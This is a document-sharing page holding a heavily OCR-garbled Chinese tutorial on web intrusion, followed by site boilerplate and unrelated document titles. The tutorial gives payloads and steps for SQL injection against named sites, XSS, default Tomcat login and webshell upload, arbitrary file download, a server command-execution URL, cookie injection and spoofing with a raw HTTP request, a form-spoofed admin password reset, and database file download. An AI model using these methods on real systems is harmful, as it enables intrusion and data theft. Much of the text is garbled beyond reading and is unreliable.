版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
第一部分常见WEB攻击一.按传统攻击分类,大概有以下几阶段5.攻击内部主机或网络,建立外连通道6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络二.下面就直接讲入侵的传统手法2.弱口令猜解,溢出,WEB渗透的办法,另外还有最后就是社会工程的方法搞定外部入口本可用的方法首先就是溢出,大家可以去看看ODAY实在没有就去找找发布过的1DAY但是一般的没有太大的成功几率.3.1.目录浏览UDimtciqfPer/■hta<xBj>Firv^xift(5iE)Miy)蒔刮⑨书徑迪案呵?帥M栖E凶ifl®冲助的33DirectoryListingFor/JiTttpJSizeFilenameSizei0,1kb0.6kb23kb1.0kb4.4kb0Akb1.8kb&5kbJ1.0kb0.7kbLastModinTue.19Nov2002D0;45:13GrFrL08Oct200406:25:50Gt'"Fri,05Sep200303:39:24GtTuo.19Nov200200:45:20GtToe,19Now2002D0:4&:20G»Tue,19Nov200200:45:20GtinFT!F氏OflOct2004D&:24:52Glr^tMen,25oa2OT4D3;40;16列Fri.OBOct200406:25:04GtFrtOCoa2004阳:25;2OGtFrLOBOct200406:25:22GtFri,(WO<t20W06:25:32GtFrL0EOct2W406:25:38Gt所有文件的名称,可以查看到docquery目录下的3.2.备份页面暴源码&辍&辍S9FViCB(Ioincn[-5iai>dalcme)曾LJhesQureeB5Data2Mail0EnviranmertEntries®管理员为了维护的方便,会在web页面的目录保存页文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码33默认管理页面漏洞TTOMCATWEBSERVER曾就Twrrtal:ServerServiceService(Tomcat-Standalone)ServiceActinonsAvailableActicms'---ServicePropertiesProp^fl^Name:ValbeTQUicat-Staodalooc'¥UM珈Dtffimliion*Uwr&綁RolesRes?EnginePropertiesName:Standdme|l«calho«t二|Res?安装的是tomcat,存在默认管理页面使用默认的账号密码可以登录。通过上传木马可以轻易就获得WEBSHELL比如,http://IP/Page.jsp?City二天津D:YNHACKUSER../inc/cls_main.asp网站路径管,第一个管理员用户名长度小于乙第一个管理员用户名长b086f71d080453fa,第三个灵男密码581abc28e23d1669,后面的工作我就不作了,如果拿到解密后的密码进入后台轻易得到WEBSHELL漏洞测试网站二:新云官方网站sertintonc_user(uvalues('123','ac590可能数据库中有这个用户了吧,那我们它密码updatenc_usersetpassword二'ac59075b964b0715'whereusername二'123',成功。现在利用辅助工具注入,前提是要登陆,不好意思,要用WEBSHE啲事,我就不去搞了。大家自3.5登陆验证不严不合格登陆输入conetmibverl.O漏洞直接进入后台构建链接http://IP/IDC.jsp?Sex二男&Sex二女&strArea=0”><script>alert(JAVASCRIPT对话框“HELLO,MATRIXAY!3.7任意文件被下载https://ip/download.jsp?downpath二down.jsp3.8暴露绝对路径提交特殊参数,导致页面出错,暴露页面文件的绝对路径序中的服劳器W9■rtdlaligin-"rif|ht:bidtt«nid-vfatnClEar'Jrunftt-"5Wk-ir^[SqKKMptiD.nivarchflj-JriWwtier<1-1—r押嗅比窗包%“nt旺氏打豎三罄圭罗富―]5ySt*fl-D«r«r5flTclient,5qlCertH*fid,Si.iCUit*Rfiidtr(C-oncind&e*iiMiQrcnciB«hB.MiorB却“乂山细中疔则iBitiit呻叶BWIMPIEEjyfitefi.CXbti.Sigicli«nt.Sqlqtmiuid,EKieciAttHgjiiqufryO,1^4-Df?EI4et_HiirrsrSi*^ie.5q1h^lper.SqTHelper-ExecuteSfi[5qlEonnrrtiancannect-iqn,Stringi$t:口r*-eProceduce-h^He.S^liPar*n^t口D匚Net_^irrofrXite.C>ore.ShawDatfi.5hc»Artic:ledleliarMp(stringChfilD.StringLeafip,String^hi-k21dDRC.Net_HiirrBrSite.Mefa.™irCjintent.^rtC1asjKmseO〒瞇fl^iP.reainCanterrt_aispM.._RwiderFonul(ItbnlT£^\riter_output.C-nfitralpnrafreterCan.tainer)inD:,>1M£Net-Z&KS',i.web\»Syaten^li^].bliCarrtrn-l.fienderCh-ilcfr-HitittBlwriter)+27h^b.LEl.tHsilCwitrolla...MffcnlFfiefiderChiIdrEn(H±mlTeitlfriierw^-Btcr}+44Sysbffeh・UI.rtt^Krnnt^ols.FQCF・RwderCrftiinlTt^tbrritertwtuut)+262System,taeb.m,Control・a*ndtrC&fltro1(HtnctTegitwritarwriter)*2JiIflrtMWl胡即dbCR诃鮎蚪护i*封"讥*72lifti..m,Contr#l,WendtiT(hrtnlTeMtWittr5yit4»-fcif*,UI,.UrndfrrCipfltrqlKtiL.m.F罩鼻e•PraccssRieque^t^ibin(}*1?ZG*7writrr)乜科■*4嗣:MicnMftNETTftnwworlii1样2S和眩ASP.hCTl.1^a222WSEhttp://IP/cmd.pl?dir+c:\服务器存在类似的脚本解释程序,可以执行服务器上的命令3.10存在upload.asp等类似文件上传文件的利用可以使用桂林老兵等上传程序突破文件名限制上传3.11php脚本远程文件包含漏洞.php脚本没有正确地验证某些变量的数欺骗漏洞session("idu")二"black-you"进后台看看吧!!3.13cookies注入ifname<>""thensql=sql&"andnamelike'%"&name&"%'"sql=sql&"andmarklike'%"&manufacturer&"%'"“504%注入语句’%504就能注入了,抓包然后把地址放在NBSI里就能注入3.14cookies欺骗漏洞来看看它的来看看它的setrs二server.CreateObject("adodb.recordset")ifnotisempty(request("SubmitRePws"))thenifrequest("password")v>request("pasn"selectpasswordfrom[user]whereusername=”‘&trim(requecallMsgBox("您的密码取回成功,请登录!","GoUrl","callMsgbox("对不起,您输入的问题答案不正确”,"Back","None")Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flash,application/vnd.ms-excel,application/vnd.ms-http://localhost/ltContent-Length:72Cookie:ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOFpassword=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&u修改就把ueername禾口password、possword2还有Content-LMicrosoftUindotj?XP:^Jiackei*\nc>nc:^Jiackei*\nc>nclocalliost80<1.httn:^Jiackei*\nc>nc:^Jiackei*\nc>nclocalliost80<1.httn”姦;;3.15—句话木马插入到数据库当中网络呼机网络呼机AIIRightsReserve3.16本地存网页欺骗服务器TRSWAS安全漏洞利用方法:详见“C:\temp\SQL注入相关\TRS用.html”vLINKhref二"./style.css"rel二stylesheet〉vSCRIPTIanguage二Javascript〉<!--functionJustifyNull1(field){varRet二truevarstr=""+field.valuefield.value二""}functionCheckForm(){if(!JustifyNull1(frmUser.NewPassword)){frmUser.NewPassword.focus();}elseif(frmUser.NewPassword.value.length<8||frmUserfrmUser.NewPassword.focus();}elseif(!JustifyNull1(frmUser.ConfirmPassword)){frmUser.ConfirmPassword.focus();}elseif(frmUser.ConfirmPassword.value!二frmUser.NewPassword.vfrmUser.ConfirmPassword.focus();}>v/SCRIPT>v/HEAD><BODYclass二bgcolor〉vTABLEalign=centerborder=OcellPadding=OcellSpacing=0width二"<FORMname="frmUser"method="post"action="http://www.trs.ccn:9000/wcm/user/findpassword/changepasswordsucc.jsp"onsuvinputtype二"hidden"name="UserName"value="admin"><TABLEborder=0cellPadding=8cellSpacing=0>v/TR>v/TBODY>v/TABLE>vTABLEalign=centerborder=OcellPadding=OcellSpacing=0width=5<TABLEborder=1borderColorDark=#ffffffborderColorLight二#000000<P><FONTcolor=#ffffff>修改密码v/FONT>v/P>v/TD><TD> </td></TR>vTDwidth二"30%">请输入您的新密码:</td>vtdwidth二"70%"><inputtype二"password"name二"NewPassword"size二vtdwidth二"70%"><inputtype二"password"name二"ConfirmPassword"sizev/FONT>v/TBODY>v/TABLE>vINPUTalt二"确"type="image"src="../../images/button-submit.gif">vIMGalt二"取消操"border=0height=21src="../../images/button-cancle.gif"onMouseOver="this.style.cursor='hand'"onclic<br>密码修改成功后,您可以直接用此密码登录系统<P>vFONTstyle二"FONT-SIZE:9pt">Copyright1998-2000<Ahref二""target=_blank>TRS司</A>Allrightsreserved.信息技术有限公vDIValign二right><BR>v/DIV>v/TD>v/TR>v/TBODY>v/TABLE>v/FORM>v/BODY>3.17下载数据库文件.tw/Comersus/database/comersus.mdb下载数据库后台管理界面http:/..ww,77169-rQinR远和娈l|用户謝表|用尸科陋|用户申瀟|念主日记|餞用带朋(JK本说明■保密日记:女人vs舅人〔星期闻不要下不要下我们先来看一下inc文件夹下的数据库连接文件conn.asp,我把它的代码复制到下面:db="data/aqbt.cn.asp"setconn=Server.CreateObject("ADODB.Connection")sqlstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath("”&db&"")dimlistnum,reguservalue''定义每页显示日记数量'首页显示的新日记数'首页显示的推荐会员数'过滤非法字符functionHTMLEncode(fString)n■口-1*嘩;」叱*巧些竺|hJLl|"2卽I®ficTweftJET41>Qui:eEngine罠J30004005*为:淨炬天堂日记寧応如蓟心tmg;不星一f有绞的谿承fllJtlS社苕祥捋耳星否正!!■处
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 电子玻璃制品研磨抛光工岗前测试验证考核试卷含答案
- 2025年石首市数学三下期中统考模拟试题含答案解析
- 纺粘针刺非织造布制作工班组管理强化考核试卷含答案
- 木作文物修复师岗中安全专项考核试卷含答案
- 聚丁二烯装置操作工岗位新材料考核试卷含答案
- 高岭土加工工岗位知识评优考核试卷含答案
- 肉制品品评师基础在岗能力考核试卷含答案
- 磨矿分级工岗位生产安全效果考核试卷含答案
- 缩放排工安全宣贯水平考核试卷含答案
- 野生植物管护巡护工岗中生产标准化考核试卷含答案
- 财务部门标准化操作流程(SOP)
- 2026年高考统编版历史二轮专题复习:「主观题(非选择题)」解题思路及技巧
- 2025年安徽省从村(社区)干部中录用乡镇(街道)机关公务员考试测试题及答案
- 放射科DR课件教学
- 2025年职业技能鉴定服务费合同模板
- 网络舆情工作课件
- 2025-2026学年清华大学版(2024)A版初中信息科技七年级上册教学计划及进度表
- 《健康养老服务基础》智慧健康养老服务与管理全套教学课件
- 汽车钣金基础课件 项目1 现代汽车车身结构设计
- 机电设备安装与调试技术教案
- 钢板弹簧设计手册技术手册指导书
评论
0/150
提交评论